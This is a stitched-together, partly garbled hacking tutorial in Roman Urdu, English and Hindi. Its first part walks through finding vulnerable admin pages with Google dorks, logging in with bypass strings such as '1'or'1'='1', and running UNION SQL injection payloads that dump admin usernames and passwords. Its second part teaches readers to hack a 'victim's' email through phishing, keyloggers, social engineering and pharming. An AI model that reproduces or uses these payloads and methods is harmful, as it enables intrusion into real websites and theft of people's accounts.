Accunetix Scanner shamil hain. Accunetix harkism ki Vulnerability find karta hai agar register ho, warna just Xss find karega. You can downloadfrom:Www.Accunetix.co/websitesecurity/sqlinjectionFor more Hacking Info, Stay with us.H-95HACKING CLASS NO. "1"1- SQL INJECTION HACKINGSab se Pehle Ap Www.Google.ComOpen KarenSearch Bar Mein LikhenInurl:adminlogin.aspJo Web Results Ayen ge Us Mein Se Jis Web k Admin Page Pe Ap Login Hona Chahte Hen Usko Open KarenUsername1'or'1'='1Password1'or'1='1Likh K Login Ho JayenAb Ap Admin Panel Mein Enter Ho Jayen geIs Method Ko Test Karne k Liye Ye Link Visit KarenH-96SQLI se admin page me name and password k bdlogin ho gae phr web me editing ks terhan krte hen.C nextH-97wo admin ki permision par ha, agar admin privilige ziada hen to tm full edit krskte ho.. Web ka c0ntent knsa ha? J00mla, wp,mgento, ya kch or?H-98P1Sql injection is a web hacking method. We use some dorks in this method. Like:inurl:id=5Search this in Google. Then open any web. The web will be something like this:Www.Site.com/index.php?id=5Then we will check that it is vulnerable (Hackable) or not. We will put ' after 5. Like:Www.site.com/index.php?id=5'If you get an syntax error, then it is vulnerable.H-99P2Now, we will find its valid columns. Put:index.php?id=5 order by 1--Keep checking untill u get an error. If you get an error in 6, then it has 5 columns. Now:index.php?id=-5 union all select 1,2,3,4,5--You will get valid column. Suppose that 4th is valid. Now find version of database.index.php?id=5 union all select 1,2,3,@@version,5--H-100P3If version is 5,u can directly find table's names.Bt if version is 4,u'll have to guess table's names. Suppose if verson is 5.1.23 (5),then find tables like this:index.php?id=5 union all select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--H-101P4You will get table's name. Now find columns:index.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=char()Now final step. Find admin id, username and pass.index.php?id=5 union all select 1,2,3,

(username,0x3a,pass) from admins--****Finish****H-102 P1H0w to hack website? H0w to be a g0od hacker? Bhot se methods hen website hacking k. But m0st p0pular ix SQL injection, xss-c00kieH-103 P2. Shelling a site via sqli...jesy koi bhe sitehack ki via sqli to hmare pas admin passwrd h0ga, to us s l0gin hojayen. Then try to find the option having names,
hacker 1

hacker 1

इस method में हम या तो terminal (या Server) पे control पा लेते हैं, या फिर उसको useless बना देते हैं, या फिर crash कर देते हैं. ये Hacking Techniques बहुत लंबे time से use किये जा रहे हैं, और आज भी use होते हैं:1. Denial of ServiceDoS attack से hackers बिना internal access पाए ही network down कर सकते हैं. DoS attacks से access routers को control करके उनपे bogus traffic डाल दिया जाता है (जो की e-mail या Transmission Control Protocol, TCP, packets हो सकतेहैं ).2. Distributed DoSsDistributed DoSs (DDoSs) multiple sources से किये जाने वाले multiple DoS attacks हैं. एक DDoS attack को रोकना या block करना बहुत मुश्किल है, क्योंकि इसमेंmultiple, changing, source IP addresses use किये जाते हैं.3. SniffingSniffing का मतलब होता है TCP packets पेinterception / attack करना. ये interception simple eavesdropping या किसी और sinister से की जा सकती है.4. SpoofingSpoofing का मतलब होता है एक किसी hacker को illegitimate packet भेजना जिसमे expected acknowledgment (ACK) हो, और जिसे hacker guess, predict, या obtain कर सके snooping की मदद से.5. SQL injectionSQL injection एक code injection Hacking Techniques है जो की एक application database layer की security vulnerability को control कर सकती है. इसमेंdatabase को access करने के लिए normalSQL commands use किये जाते हैं.6. Viruses and WormsViruses and worms self-replicating programs या code fragments हैं जो की खुद को other programs (viruses) या machines (worms) से attach कर लेते हैं. Viruses और worms दोनों ही network को shut down करने की कोशिश करते हैं, जो की bogus traffics के द्वारा किया जाता है.7. Back DoorsHackers किसी भी network पे उसकी back doors administrative shortcuts, configuration errors, deciphered passwords, और unsecured dial-ups को access कर के control पा सकते हैं. Computerized searchers (bots) की help से hackers किसी भी network की weakness को ढून्ढ सकते हैं.*.Read – WhatsApp Account को Hack होने से कैसे बचाएक्या ये interesting नहीं है ? अभी और भी बहुत कुछ है. तो चलिए अब email के passwords hack करने के बारे में जानते हैं:8. Trojan HorsesTrojan horses, जो की other programs केसाथ attached होते हैं, break-ins के सबसे बड़े कारण हैं. जब भी कोई user Trojan horse को download या activate करता है, तो ये software उस user के system पे पूरी तरह से control पा जाता है और उस computer को control भी कर सकता है. great..!!! इन्हें RATs(Remote Administration tools) भी कहा जाता है.9. KeyloggersSituation को समझिये, आप एक system में जो भी type करते हैं वो एक hacker को mail हो जाता है..!! क्या इससे password hack करना आसान नहीं हो जाता. Keyloggers ऐसे ही functions perform करते हैं, इसलिए अगली बार कुछ भी type करने से पहले सावधान रहे.!! इससे कैसे बचें, उसके बारे में भी आप Google कर सकते हैं.10. Brute Forcingये सबसे लंबा, और थका देने वाला काम है,इसका use कभी भी ना करें अगर आपको अपने victim का SET of password नहीं पता है.Note:Victim मतलब जिसका email आप hack करना चाहते हैं.11. Secret QuestionSecurity companies के द्वारा किये गए survey के अनुसार, ये पाया गया है की, security question hackers के लिए बहुत ज्यादा helpful हैं. इसलिए, अगर आप victim को अच्छे से जानते हैं, तो इसे जरूर try करें.12. Social Engineeringये hacking की सबसे old tricks में से एक है. इस method में, आप अपने victim को यकीनदिलाने की कोशिश करें की आप एक legitimate person हैं और आपको उनके password की जरुरत है, उनके account की maintenance के लिए. ये आज के time में काम नहीं करता क्योंकि अब सभी users scam के बारे में जानते हैं, अगर आप किसी और तरीके से users को convince कर सकते हैं, तो ही ये method use करें !13. Phishingये keylogging का एक प्रकार है, इस method में आपको user को एक ऐसे webpage पे लाना पड़ता है जो की आप ने create किया है, user जैसे ही अपना password type करता है, आप उसका password, अपने mail box में पा सकते हैं..!!14. Fake Messengersये Phishing के application format का हीएक प्रकार है. इस method में आपको user कोकिसी तरह अपने software में password enter करवाना होता है, और फिर आप passwordदेख सकते हैं.15. Cookie Stealerइस method में sites में जो cookies saved होती हैं उन्हें decode किया जाता है, और अगर आप lucky हो, तो आपको password मिल सकता है.!!!*.Read – अपने Web browser Tabs को सरलता से Manage कैसे करेHmmm.. एक बार में एक account hack करने में मज़ा नहीं आ रहा ? तो चलिए multipleaccounts hack करने के कुछ तरीके देखते हैं.16. DNS Poisoning or PHARMINGPhisihing एक बहुत मुश्किल काम है..है न ?? किसी को अपने page पे उनका password डालने के लिए convince करना..?? कैसा होगा अगर उन्हें directly आपकी site पे redirect कर दिया जाए बिना किसी clue के ?? Nice न … Pharming आपके लिए यही करता है.17. Whalingइस method से आप hackers के उस account का password पा सकते हैं, जो की hackers दुसरो के passwords receive करने के लिए use करते हैं. यानी आपको सिर्फ एक ID hack करनी है, ये सबसे simplest method है. आपके pass बहुत से passwords होंगे, मतलब बहुत से accounts आपके control में..!